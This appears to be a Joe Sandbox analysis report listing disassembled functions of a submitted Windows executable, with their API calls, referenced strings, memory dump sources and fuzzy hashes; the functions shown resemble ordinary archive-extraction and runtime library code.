Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 52cb1eb675416163c249356dbfc5ddeb98316822a111bbed88b39277c93515a5
Instruction ID: bca05d5833e3b520f98cfdba971dc9cf3bf76e8103c7c5f70102d407791cd898
Opcode Fuzzy Hash: 52cb1eb675416163c249356dbfc5ddeb98316822a111bbed88b39277c93515a5
Instruction Fuzzy Hash: FCF0A474C11720EF8A41AB19EC014E87B75FB24735309820BF41AD6B61CBF68841CFB4

Function 00DA3748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DA3910
_swprintf.LIBCMT ref: 00DA39BF

Strings

%s: %s, xrefs: 00DA391F
%ls, xrefs: 00DA3795, 00DA37AB

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 17c5c24d34efd57466c6bd15605dbc26fe2c491b333a5ee21ccc329f8c773568
Instruction ID: 43652b0bf6d2d80b130f9955356a6879aad66b17d1ad32a3f1d718dae85138bf
Opcode Fuzzy Hash: 17c5c24d34efd57466c6bd15605dbc26fe2c491b333a5ee21ccc329f8c773568
Instruction Fuzzy Hash: 6A51A7B5648305FAF6211B988D43F7A7A67EB07F00F204506F3CA654D1C6A1D750AF76

Function 00DBA7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8Ck8T5qRcC.exe,00000104), ref: 00DBA800
_free.LIBCMT ref: 00DBA8CB
_free.LIBCMT ref: 00DBA8D5

Strings

C:\Users\user\Desktop\8Ck8T5qRcC.exe, xrefs: 00DBA7F7, 00DBA7FE, 00DBA82D, 00DBA865

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\8Ck8T5qRcC.exe
API String ID: 2506810119-188225635
Opcode ID: 1472d82f3c047200aea738118a1680c31a67dbf2e8ba6b0a2f4f21cef07bcf11
Instruction ID: 4f90b2ca69a8d6e84f421d014e1ca2600e5d8425cddb6d7c1c8b1f4e803db790
Opcode Fuzzy Hash: 1472d82f3c047200aea738118a1680c31a67dbf2e8ba6b0a2f4f21cef07bcf11
Instruction Fuzzy Hash: 2F316175A00318EFDB21DB9DD8859EEBBFCEB84710B148067E50697611D6B08E41DBB1

Function 00DB57F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DB581B
_abort.LIBCMT ref: 00DB5926

Strings

MOC, xrefs: 00DB582D
RCC, xrefs: 00DB5835

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: f4bd319a36c35dd061e442fb4ad4ba09312eff896a695adfdae85c6fffd239a6
Instruction ID: 2d9076c7fd8804a860474293006e69d458f518ce6a78408f56f34e0147e18233
Opcode Fuzzy Hash: f4bd319a36c35dd061e442fb4ad4ba09312eff896a695adfdae85c6fffd239a6
Instruction Fuzzy Hash: 2C416636900609EFCF16CF98D881BEEBBB5EF48310F188159F916A6215D3359950DF60

Function 00D9F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00D9F82D
_strncpy.LIBCMT ref: 00D9F871

Part of subcall function 00DA3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00D9F801,00000000,00000000,?,00DD5070,?,00D9F801,?,?,00000050,?), ref: 00DA3F64

Strings

@%s, xrefs: 00D9F817
$%s, xrefs: 00D9F822

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 005bc7892107a3fcd1d324b5cab2fa755bb1d08330781a0ceb89af14c3e73418
Instruction ID: e98bcb309b904cc6e65435d6e7fbf960b6076d011573bb55f33c88d37c4d0ae6
Opcode Fuzzy Hash: 005bc7892107a3fcd1d324b5cab2fa755bb1d08330781a0ceb89af14c3e73418
Instruction Fuzzy Hash: B7214AB2900349ABDF20DFA4CD41FAE77A8FB15700F08052AF961D7191E772EA199B71

Function 00DACDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

EndDialog.USER32(?,00000001), ref: 00DACE28
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DACE3D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DACE52

Strings

ASKNEXTVOL, xrefs: 00DACDB8

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 0c48a1091b557293b9d13b04b4687ef666a73e85c0fe686cb5b43c7227ead3d1
Instruction ID: b82304d023ff6dd8c637c36aa50b4f844dc8df7192683d245ba2a309aba7edb9
Opcode Fuzzy Hash: 0c48a1091b557293b9d13b04b4687ef666a73e85c0fe686cb5b43c7227ead3d1
Instruction Fuzzy Hash: 5511D032650345AFDB219B68ED09F763FA9FB4BB50F044014F342EB2A4C7629A05D7B5

Function 00DA2F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F61
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F6B
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D9CAA0,00000008,00000004,00D9F1F0,?,00000000), ref: 00DA2F7B

Strings

Thread pool initialization failed., xrefs: 00DA2F93

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 19daf5bb8b944dc4f3b7c2b7c7d29559f8a87f2c9452e1105015bf5f216efca4
Instruction ID: ac5efc9573de12e2b97649a7ea552874c9ac1882b2ca1c286ab4bf4bdffad7ee
Opcode Fuzzy Hash: 19daf5bb8b944dc4f3b7c2b7c7d29559f8a87f2c9452e1105015bf5f216efca4
Instruction Fuzzy Hash: E5114CB164470AAFC3215F6B9C84AA7FBECEF96744F54482EF1DAD2240D6B199408B70

Function 00DB00EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00DB0143
REPLACEFILEDLG, xrefs: 00DB012E, 00DB0162

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 61971b8265f8d4fba67a1342b05fc03836b64dd886f755d135b8aed879db396e
Instruction ID: 2284288920edbb7438bcec004290c788fab5bf309edc1e1a35eee016bc9d5daa
Opcode Fuzzy Hash: 61971b8265f8d4fba67a1342b05fc03836b64dd886f755d135b8aed879db396e
Instruction Fuzzy Hash: 51014871609346EFDB559F28EC48AB77FA8AB19790F084026F946D3370D6219860DBB0

Function 00D94B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D94B42

Part of subcall function 00DB106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00DB1079
Part of subcall function 00DB106D: ___delayLoadHelper2@8.DELAYIMP ref: 00DB109F

std::_Xinvalid_argument.LIBCPMT ref: 00D94B4D

Strings

vector too long, xrefs: 00D94B48
string too long, xrefs: 00D94B3D

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
String ID: string too long$vector too long
API String ID: 2355824318-1617939282
Opcode ID: 2f0e63ae2e1d82a8e4f0a34dff7e78af09cf9be3e80ce1c6aa0510a2d375ee3c
Instruction ID: 88801be92f4c2b607842f709ee0dea44ad86831001e1c017c56a61ed96f6e173
Opcode Fuzzy Hash: 2f0e63ae2e1d82a8e4f0a34dff7e78af09cf9be3e80ce1c6aa0510a2d375ee3c
Instruction Fuzzy Hash: E4F0A031200304AB8F34AF59DC46D4AB3EDEF84B68B10091AF985C3602C3B0E94587B1

Function 00DBC06A Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00DBC0F5
__alldvrm.LIBCMT ref: 00DBC2F6
__alldvrm.LIBCMT ref: 00DBC318

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction ID: 54dd9e21e3258a98f0cffc762363486eda4f1f080b0e51819bcbf69fd13cb0ca
Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
Instruction Fuzzy Hash: D6A13772A20386DFDB25CF68C8917EEBBE4FF52350F18416DE496AB242C6388941C774

Function 00D9C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00D99343,?,?,?), ref: 00D9C1EE
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00D99343,?,?), ref: 00D9C22C
SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00D99343,?,?,?,?,?,?,?,?), ref: 00D9C2AF
CloseHandle.KERNEL32(00000800,?,?,?,00D99343,?,?,?,?,?,?,?,?,?,?), ref: 00D9C2B6

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 5a90a7c4cbef208b5a46e74f3f42a8a9318fc1d0638b03f27cb58641f3d5a35c
Instruction ID: bc1bc4ebc44774abd2102ec9241412c97d5d972f866886b43663031824ad1304
Opcode Fuzzy Hash: 5a90a7c4cbef208b5a46e74f3f42a8a9318fc1d0638b03f27cb58641f3d5a35c
Instruction Fuzzy Hash: C341F3302583819EEB21DF64DC51FABB7E8AF89700F08091DF5D2E71C1D664EA488776

Function 00D910E0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D91136
_wcslen.LIBCMT ref: 00D9115A
_wcslen.LIBCMT ref: 00D91187
_wcslen.LIBCMT ref: 00D911AC

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 2b7bcb84ad9eaec8822e87a6a3bd6ff6ea22e070a044d49416d4873e617a3547
Instruction ID: d072afeceb4147de17e041252ebf0e3501991afc3fc626873bdc7da2ab816264
Opcode Fuzzy Hash: 2b7bcb84ad9eaec8822e87a6a3bd6ff6ea22e070a044d49416d4873e617a3547
Instruction Fuzzy Hash: 0C41A4719087529BC725DF38C8459AFBBE8EF85700F04492DF989D3250DB30E9058BB6

Function 00DBEFD8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00DB6F64,00000000,00000000,00DB7F99,?,00DB7F99,?,00000001,00DB6F64,62E85006,00000001,00DB7F99,00DB7F99), ref: 00DBF025
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DBF0AE
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DBF0C0
__freea.LIBCMT ref: 00DBF0C9

Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7e70494771ae154438b54b142e557589f7c791c0aea536090501eee5309bcb0d
Instruction ID: bb6dc1cfd725e295290f92d1063d8f0a1056b679079d33a8025c2ac2b2c1e6e7
Opcode Fuzzy Hash: 7e70494771ae154438b54b142e557589f7c791c0aea536090501eee5309bcb0d
Instruction Fuzzy Hash: 2D31A072A0021AEBDB25AF64DC45EEE7BA5EB44710B084129FC05D72A1EB35DD54CBB0

Function 00DAC5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DAC5F6
GetDeviceCaps.GDI32(00000000,00000058), ref: 00DAC605
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DAC613
ReleaseDC.USER32(00000000,00000000), ref: 00DAC621

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 63ff91193044e79b2a1c7729ed3f8ca4d0f9f9738945cc45025b025c7adfa1ef
Instruction ID: 444f7f3686949c648b53ce84686e1ef34f6aee1f5f875e9bee87fe1514db4e94
Opcode Fuzzy Hash: 63ff91193044e79b2a1c7729ed3f8ca4d0f9f9738945cc45025b025c7adfa1ef
Instruction Fuzzy Hash: 94E0EC319AA761A7D7611B60AC1DFE63B64FF1A713F089106F601D63A0CA705404CFF5

Function 00DAC79C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 00DAC629: GetDC.USER32(00000000), ref: 00DAC62D
Part of subcall function 00DAC629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAC638
Part of subcall function 00DAC629: ReleaseDC.USER32(00000000,00000000), ref: 00DAC643

GetObjectW.GDI32(?,00000018,?), ref: 00DAC7E0

Part of subcall function 00DACA67: GetDC.USER32(00000000), ref: 00DACA70
Part of subcall function 00DACA67: GetObjectW.GDI32(?,00000018,?), ref: 00DACA9F
Part of subcall function 00DACA67: ReleaseDC.USER32(00000000,?), ref: 00DACB37

Strings

(, xrefs: 00DAC935

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 18564bfe59b54531424cd198f005ad43e9e70b351ffe1d389d163522a014d7b6
Instruction ID: d537b11268c0f92871f53d382e5ebdd2f348e461a3483c3aae94196dea945efd
Opcode Fuzzy Hash: 18564bfe59b54531424cd198f005ad43e9e70b351ffe1d389d163522a014d7b6
Instruction Fuzzy Hash: 9191CD71618356AFD610DF29C844E2BBBE8FF89B10F00495EF48AD7260DB74E905CB62

Function 00DAD76E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DAD7D1
_wcslen.LIBCMT ref: 00DAD7EC

Strings

}, xrefs: 00DAD7C4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 14af22bc69374b2dd23c2f73a3bbb3e6434dd0d6c14b2370f63cc5878a826bfe
Instruction ID: d9f70448777cbd7f0aeb4fb18e02df59557cd3284263a854d5975bf9323cda2a
Opcode Fuzzy Hash: 14af22bc69374b2dd23c2f73a3bbb3e6434dd0d6c14b2370f63cc5878a826bfe
Instruction Fuzzy Hash: 3621C1329083459AD731EB74D845AABB3EDEF86710F44042EF542C3541EA74E848C7F2

Function 00DA136B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DA12F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DA1315
Part of subcall function 00DA12F6: GetProcAddress.KERNEL32(00DDC1F0,CryptUnprotectMemory), ref: 00DA1325

GetCurrentProcessId.KERNEL32(?,00000200,?,00DA1366), ref: 00DA13F9

Strings

CryptProtectMemory failed, xrefs: 00DA13B0
CryptUnprotectMemory failed, xrefs: 00DA13F1

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
